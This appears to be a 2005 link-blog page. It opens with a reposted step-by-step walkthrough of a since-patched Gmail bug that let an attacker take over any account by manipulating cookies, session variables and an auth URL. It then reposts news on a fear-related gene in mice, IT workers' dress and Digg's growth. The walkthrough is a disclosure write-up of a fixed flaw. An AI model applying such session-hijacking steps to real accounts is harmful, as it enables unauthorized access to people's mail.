Friday, November 18, 2005
GMail Exploit
INTRODUCTION
This bug has already been corrected, that's why it's been published.
In this manual you will see step by step how to exploit Gmail's vulnerability, that gave you access to any account, reported by Anelkaos, colaborator of elhacker.net's forum and patched by Google by October 18. Due to the bug's gravity (that allowed in a few simple steps to login in any Gmail account), it was decided not to publish this document while the bug was still active. Motives are more than obvious because ALL Gmail accounts was vulnerable to the bug.
Google hasn't declared definitively this topic, and they seem not to have intention to publish the bug. The veracity of the failure was demonstrated to the editors of the Magazine "Seguridad0", logging into an account created for that purpose, just as described in http://www.elistas.net/lista/informativos/archivo/indice/61/msg/79/. They also "dare" to publish this news in CyruxNET and PCWorld.
The bug was discovered in October 14 and it was patched in October 18 because ANELKAOS decided to conctact GMail instead of publishing the bug in a list of security, and lamentably we couldn't do more demos in other sites that we sent the news, and because we're not HBX Networks, all the people claimed for a "hacking' test". Thanks to heaven, we have saved all the mails where Google recongnize the failure. ;).
Unlike the reported by HBX and published by BetaNews last year, this bug doesn't require cookie robbery, and because of that, the bug's danger was considerably higher.
PROCEDURE
This is the way Sirdarckcat (EHN's user) developed the exploit, although the original method is easier, the concept is the same one.
Due to the fact that this demonstration was realized against another's person account, all data that could bring legal consequence have been hiden. In AUTH variable goes the ciphered address of the mail's propetary, and although we don't know how to decipher it, we've preferred to hide its values, in case "someone else" could :).
First of all, we need two sessions. For that we've chosen to use Internet Explorer and Mozilla. We start the session normally... for example, in Mozilla..
If we pay attention, we notice that the login screen is now different. It doesn't just ask if you've forgotten your password, it also ask now for the user. Too much casualty, isn't it? That soon and coinciding with the publishing of the bug's existence it has changed the authentication is too much coincidence, isn't it? We're talking about 10 days :).
Well, let's continue. Now we need some data we'll modify. For that we will also iniciate an Internet Explorer session, but we stop the browser as soon as it says "Loading...".
We simply look at the source code and we save the value of the "ver" variable, that we will need later.
Then we allow the page to continue loading, and we look the direction of the inbox, that we can see by pressing right clicking, and then Properties.
We will need the "zx" variable, and we save it.
Now we go to 'mail/?username=victim&zx=[zx Variable]'
And we stop the charging of the page just when it stops Loading, getting inside:
We stop again the browser, and we look at the source code.
Here we have the code of AUTH that we need to initiate session as our victim, but our cookie disagree (not the same).
We at look what we have in the cookie, and we change the value of "ID" for the one we got in the "ver" variable we got before, this what surprising makes is to return a valid value! It doesn't have related information, why does that happen? Who knows...
GMail confirms that it's well ciphered, and completes correctly all the rules. Nevertheless, even the content is not related, it doesn't return an error.
Once modified the cookie, in the Explorer session, we enter into the following page:
http://mail.google.com/mail?gxlu=victim&zx=[zx Variable]
In this moment we haven't already started the session, we've just associated with the victim's account.
So we go to: www.google.com/accounts/ServiceLoginAuth.
And it sends you to:
mail.google.com/mail/?auth= [CODIGO auth]
At this point all we have to do is to modify the values of the cookie that will expire... At least we give it 1 minute of life.
We enter mail.google.com/mail/?&&rm=false&null=Entrar&continue
We stop the loading because if we don't, Google is going to close our session, so we write:
javascript:document.cookie+=";expires=Thu,%2001%20Jan%202070%2000:00:00%20GMT";
Once extended the cookie's life, we enter http://mail.google.com/mail/?auth=[AUTH Code]
And we start the session as the victim.
Complete access, of course :).
GOODBYE AND CLOSE.
OK, it's a Beta version, and they don't have to report anything. But if they would have recognized it and published a thank you note, this information wouldn't had been published. We have 3 ways to get to the same result, the others 2 are quite easier, and because of that easily we can deduce that it's a multibug, and a design error. With all these clues, they will not take too much to discover new methods.
source:http://www.elhacker.net/gmailbug/english_version.htm
Gene turn-off makes meek mice fearless
Deactivating a specific gene transforms meek mice into daredevils, researchers have found. The team believe the research might one day enable people suffering from fear – in the form of phobias or anxiety disorders, for example – to be clinically treated.
The research found that mice lacking an active gene for the protein stathmin are not only more courageous, but are also slower to learn fear responses to pain-associated stimuli, says geneticist Gleb Shumyatsky, at Rutgers University in New Jersey, US.
In the experiments, the stathmin-lacking mice wandered out into the centre of an open box, in defiance of the normal mouse instinct to hide along the box’s walls to avoid potential predators.
And to test learned fear, the mice were exposed to a loud sound followed by a brief electric shock from the floor below them. A day later, normal mice froze when the sound was played again. Stathmin-lacking mice barely reacted to the sound at all.
Neural responses
In both mice and humans, the amygdala area of the brain serves as the control centre of basic fear impulses. Stathmin is found almost exclusively in this and related brain areas.
The protein is known to destabilise microtubule structures that help maintain the connections between neurons. This allows the neurons to make new connections, allowing the animal to learn and process fear experiences, Shumyatsky says. Without it, the neural responses are stilted.
The lack of the protein does not appear to affect other learning experiences, as both sets of mice were able to memorise the paths out of mazes equally well. “This is a good sign for an eventual clinical application that could let people deal with their fears in an entirely different way,” Shumyatsky says.
In 2002, Shumyatsky and colleagues published a study on a similar gene encoding for a protein called GRP. But this protein seems only to be associated with learned fear, and would therefore only have clinical implications for conditions such as post-traumatic stress disorder.
Stathmin, on the other hand, seems to affect both learned and innate fear, which could lead to treatments for a much broader range of phobias and anxiety disorders, Shumyatsky says.
Journal reference: Cell (DOI: 10.1016/j.cell.2005.08.038)
Related Articles
Weblinks
- Gleb Shumyatsky, Rutgers University
- http://lifesci.rutgers.edu/~genetics/faculty/webpages.asp?FACULTYID=25
- Cell
- http://www.cell.com/
source:http://www.newscientist.com/article.ns?id=dn8337&print=true
IT workers dubbed 'worst dressed'
More than 150 tech professionals attended a corporate fashion show in Sydney as organisers officially dubbed the industry "the worst dressed" in Australia.
Short sleeved shirts, man-made fibres and the wrong coloured socks were some of the most common fashion faux-pas cited by corporate stylist, Melanie Moss, who hosted the event on Wednesday night.
"Because the majority of IT people are not in front of customers all the time, they tend to slack off," she said.
Help-desk staff were named as the worst offenders, followed by those working in technology start-ups, many of whom had continued to wear T-shirts to work as a consequence of the casual web culture of the '90s.
"The internet is now such a massive industry but people haven't caught up in terms of their dress," she said.
Trudy David, a training manager for Apple Computer, conceded her industry had some image problems when it came to style but felt the event had helped to give attendees a "mindshare" that it was important to present oneself well.
"I think the way in which you present yourself is very important to building relationships and is integral to business and personal success," she said.
The Corporate Chic show was devised by computer training company, Cliftons. Managing director Andrew Cameron said: "It seems Sydney is ready to consider corporate styling, and we hope to take the concept to the rest of Australia".
Ms Moss believes money should be no object when it comes to dressing well.
"This is not only about wearing suits, just a good quality shirt with a nice print and smart slacks is often enough as long as everything co-ordinates."
She added that wearing natural fibres was also important. "Polyester doesn't wear well, and gets sweaty and smelly," she said.
Her top tip for those seeking a fresh look is to photograph a variety of nice combinations from your wardrobe to use as a reference when dressing in the morning.
She also recommends looking through magazines to get a feel for what suits you. "This is about thinking about what suits you instead of following trends," she said.
And if you must wear jeans and thongs in to work, feet must be in a good condition. "That means no yellow toe nails," she said.
Ms Moss said retail ranked as the second most unfashionable profession with some of the salesmen in the industry displaying "quite shocking" dress sense.
source:http://www.smh.com.au/articles/2005/11/17/1132016909640.html?oneclick=true
The 11-Year Quest to Create Disappearing Colored Bubbles
source:http://science.slashdot.org/article.pl?sid=05/11/17/2250259&tid=159&tid=14
Digg Just Might Bury Slashdot
Story location: http://www.wired.com/news/technology/0,1282,69568,00.html
02:00 AM Nov. 17, 2005 PT
A hot new social-bookmarking site is deluging web servers all over the net with a tsunami of traffic -- and is starting to make Slashdot-size waves.
Digg, a San Francisco news site compiled by its own readers, lists links to interesting new technology articles. A mention on the front page can cripple a server for days, in a pattern that mirrors the famed
Although the two sites employ different publishing techniques -- editors maintain 7-year-old tech granddaddy Slashdot, while Digg runs stories proposed and voted on by members -- many are calling the upstart a "Slashdot killer."
The comparisons are clear -- while the official term for adding a link to Digg is "digging," popular sites that receive a huge wave of traffic get a "Diggdotting," a nod to "Slashdotting."
Digg's status as the new Slashdot is further enhanced by digg vs dot, a comparison project that finds diggers are usually first to the punch, though users of each site often submit identical stories.
Celebrating its first birthday this month, Digg's traffic is fast catching up with Slashdot's. Its 80,000-user base is doubling every three months, and the surprised owners of linked-to websites are feeling the results of its popularity.
"My site was virtually unknown to anyone besides friends, but when my story made it to the front page of Digg, my stats skyrocketed," said Jesse Crouch of Springfield, Illinois, whose blog leapt from 400 daily visitors to more than 7,000 when his tutorial on small-budget photography was picked up by Digg last week.
"When (the CPU) hit 100 percent for a few moments, I was worried," Crouch said. "My server had never experienced anything like this before, and when your site finally gets some exposure, it's the worst possible time for it to go down."
The effect is felt far and wide. Digg gets up to 1,000 links submitted every day and 500,000 visitors, radiating traffic around the web. Its growth has been so pronounced that the site's own server melted down earlier this month.
But extra infrastructure and new staff will be added, thanks to a $2.8 million investment from a high-profile consortium of investors, including Netscape co-founder Marc Andreessen.
"Digg is quite different from (older) sites," said founder Kevin Rose. "Slashdot is put together by an editorial board. Digg uses the collective wisdom of the masses and, consequently, news breaks faster."
Such growth, and the absence of formal editors, has prompted concerns that unscrupulous marketers could tap Digg to bring lucrative traffic to attention-seeking clients.
But David Kirk, a designer whose tech-recipes site is routinely pounded by Digg links, cautions webmasters against expecting dollar signs.
"People try to game Digg every day, but we only see minor bumps in our advertising income on the days that we have experienced the Digg effect," he said. "Digg users visit, look around and move on (without clicking ads). For many sites, that increase in income would not even cover the increased cost of bandwidth used."
Critics also say Digg is more chaotic than Slashdot, which often features more technical, detailed conversations. But Digg, with its tight weblog integration and Flickr-like reliance on the collective efforts of its members, is pointing the way to a new wave of socially assembled news initiatives, organized and made sense of by readers themselves.
Sites like del.icio.us or the soon-to-be-unveiled Newsvine, which will let readers bookmark, share and reply to online stories from a range of news organizations, are examples of that wave.
"We plan to expand into a variety of other areas including science and political news, developing new areas that will be similar to sections of a newspaper," said Rose. "People like Digg because it's fast, convenient and relevant. They feel like they are contributing and driving honesty in media as a result of digging."
source:http://www.wired.com/news/print/0,1294,69568,00.html
